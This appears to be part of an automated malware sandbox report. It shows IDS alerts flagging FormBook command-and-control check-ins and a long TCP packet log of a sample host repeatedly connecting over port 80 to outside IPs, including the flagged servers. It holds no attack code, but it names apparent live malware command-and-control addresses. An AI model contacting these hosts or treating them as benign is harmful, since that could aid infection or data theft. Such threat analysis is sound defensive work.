                  2024-09-14T11:12:50.939526+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449760162.0.239.14180TCP
                  2024-09-14T11:12:53.457606+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449761162.0.239.14180TCP
                  2024-09-14T11:13:07.153462+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976284.32.84.3280TCP
                  2024-09-14T11:13:09.671094+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976384.32.84.3280TCP
                  2024-09-14T11:13:12.239819+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976484.32.84.3280TCP
                  2024-09-14T11:13:14.891931+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976584.32.84.3280TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 14, 2024 11:11:11.583623886 CEST4973780192.168.2.43.33.130.190
                  Sep 14, 2024 11:11:11.588516951 CEST80497373.33.130.190192.168.2.4
                  Sep 14, 2024 11:11:11.588620901 CEST4973780192.168.2.43.33.130.190
                  Sep 14, 2024 11:11:11.594907045 CEST4973780192.168.2.43.33.130.190
                  Sep 14, 2024 11:11:11.599790096 CEST80497373.33.130.190192.168.2.4
                  Sep 14, 2024 11:11:12.967840910 CEST80497373.33.130.190192.168.2.4
                  Sep 14, 2024 11:11:12.967914104 CEST80497373.33.130.190192.168.2.4
                  Sep 14, 2024 11:11:12.968204975 CEST4973780192.168.2.43.33.130.190
                  Sep 14, 2024 11:11:12.971141100 CEST4973780192.168.2.43.33.130.190
                  Sep 14, 2024 11:11:12.976283073 CEST80497373.33.130.190192.168.2.4
                  Sep 14, 2024 11:11:28.577025890 CEST4973880192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:28.581959009 CEST804973818.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:28.582051039 CEST4973880192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:28.590806961 CEST4973880192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:28.595577955 CEST804973818.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:29.516406059 CEST804973818.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:29.516444921 CEST804973818.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:29.516501904 CEST4973880192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:30.097549915 CEST4973880192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:31.115758896 CEST4973980192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:31.120649099 CEST804973918.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:31.120731115 CEST4973980192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:31.131051064 CEST4973980192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:31.137799025 CEST804973918.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:32.058912039 CEST804973918.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:32.058944941 CEST804973918.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:32.059029102 CEST4973980192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:32.644278049 CEST4973980192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:33.662437916 CEST4974080192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:33.667576075 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.667692900 CEST4974080192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:33.677061081 CEST4974080192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:33.682007074 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682018995 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682145119 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682154894 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682163000 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682543993 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682553053 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682560921 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:33.682569027 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:34.569891930 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:34.612982988 CEST4974080192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:34.799669027 CEST804974018.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:34.799763918 CEST4974080192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:35.191325903 CEST4974080192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:36.209552050 CEST4974180192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:36.214617968 CEST804974118.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:36.214720964 CEST4974180192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:36.221396923 CEST4974180192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:36.226341963 CEST804974118.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:37.124176979 CEST804974118.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:37.124285936 CEST804974118.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:37.124366999 CEST4974180192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:37.126503944 CEST4974180192.168.2.418.139.62.226
                  Sep 14, 2024 11:11:37.131345987 CEST804974118.139.62.226192.168.2.4
                  Sep 14, 2024 11:11:42.387702942 CEST4974280192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:42.395014048 CEST804974266.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:42.395092964 CEST4974280192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:42.404767036 CEST4974280192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:42.409759045 CEST804974266.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:42.992011070 CEST804974266.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:42.992057085 CEST804974266.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:42.992237091 CEST4974280192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:43.909956932 CEST4974280192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:44.928035975 CEST4974380192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:44.934243917 CEST804974366.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:44.934355021 CEST4974380192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:44.943120956 CEST4974380192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:44.947971106 CEST804974366.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:45.517853022 CEST804974366.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:45.517950058 CEST804974366.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:45.518034935 CEST4974380192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:46.456845999 CEST4974380192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:47.475641966 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:47.480546951 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.480664015 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:47.491945982 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:47.496889114 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.496898890 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.496928930 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.496937037 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.496958017 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.496965885 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.497003078 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.497010946 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.497018099 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:48.087112904 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:48.128715992 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:48.156624079 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:48.156810999 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:49.003736019 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.022319078 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.034684896 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.034872055 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.040980101 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.045794010 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612376928 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612507105 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612517118 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612643957 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612929106 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.613125086 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.617424011 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.622173071 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:56.388959885 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:56.394188881 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:56.394294024 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:56.460100889 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:56.464945078 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:57.284892082 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:57.284979105 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:57.285087109 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:57.972623110 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:58.991624117 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:58.997800112 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:58.997874022 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:59.008897066 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:59.015151978 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:59.884313107 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:59.884442091 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:59.884516001 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:00.519340992 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.538364887 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.543246031 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.543349981 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.554862022 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.559861898 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559871912 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559886932 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559895992 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559906006 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560389042 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560465097 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560527086 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560539007 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:02.426007986 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:02.431524992 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:03.066459894 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:03.071434975 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.085556030 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.090655088 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.090755939 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.097100973 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.101984024 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.990652084 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.990710974 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.990793943 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.993753910 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.998615980 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:10.642126083 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:10.650418043 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:10.653945923 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:10.665671110 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:10.675323963 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:11.113064051 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:11.113126040 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:12.175755978 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:12.180717945 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:13.194293976 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:13.200364113 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:13.200442076 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:13.210875988 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:13.216779947 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:14.598299026 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:14.599654913 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:14.722897053 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:14.727866888 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.746252060 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:15.751240969 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.751306057 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:15.766053915 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:15.770975113 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.770986080 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771042109 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771056890 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771095037 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771116972 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771140099 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771147966 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771157980 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:16.215840101 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:16.217823029 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:17.269359112 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:17.274365902 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.287887096 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.292792082 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.295659065 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.305566072 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.310379028 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.771275997 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.771373987 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.771436930 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.774107933 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.778907061 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:32.017718077 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.023211002 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.027772903 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.041430950 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.046250105 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.485328913 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.486071110 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.486082077 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.486159086 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.486160040 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:33.550649881 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.568984985 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.577024937 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:34.577841997 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.589665890 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.594579935 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042042017 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042124987 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042135000 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042181969 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:35.042181969 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:36.097529888 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.115900040 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.120902061 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.120971918 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.130942106 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.343719959 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.343962908 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344074011 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344315052 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344327927 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344340086 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344353914 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344383955 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344394922 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.821768999 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.821868896 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.821880102 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.822272062 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:38.644707918 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.663916111 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.668843985 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:39.668914080 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.676362038 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.681211948 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145515919 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145533085 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145564079 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145807028 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:40.151612043 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:40.156810999 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:45.209527969 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.214483976 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.214555025 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.226059914 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.230926037 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819773912 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819793940 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819804907 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819860935 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819856882 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819874048 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819885015 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819896936 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819909096 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819920063 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819924116 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819931030 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819958925 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819958925 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819993973 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.824719906 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.824762106 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.824773073 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.824840069 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.906585932 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906621933 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906657934 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906687021 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906688929 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.909465075 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:46.738225937 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.757251978 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.762115002 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:47.762222052 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.771934032 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.776757956 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348790884 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348839998 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348855019 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348875999 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348891020 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348903894 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348917961 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348922968 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.348932028 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348948002 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348963022 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348963022 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.348985910 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.349023104 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.353954077 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.354238033 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.354252100 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.354288101 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.394413948 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.433134079 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433160067 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433176041 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433219910 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.433309078 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433357000 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:49.285217047 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.305799007 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.310703039 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.311050892 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.321208954 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.326256990 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326267004 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326273918 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326282024 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326311111 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326319933 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326327085 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326334953 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326342106 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939414978 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939429998 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939439058 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939448118 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939457893 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939469099 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939479113 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939496040 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939506054 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939526081 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.939589977 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939598083 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.939598083 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.939632893 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.944468021 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944478035 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944485903 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944493055 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944644928 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.944645882 CEST4976080192.168.2.4162.0.239.141
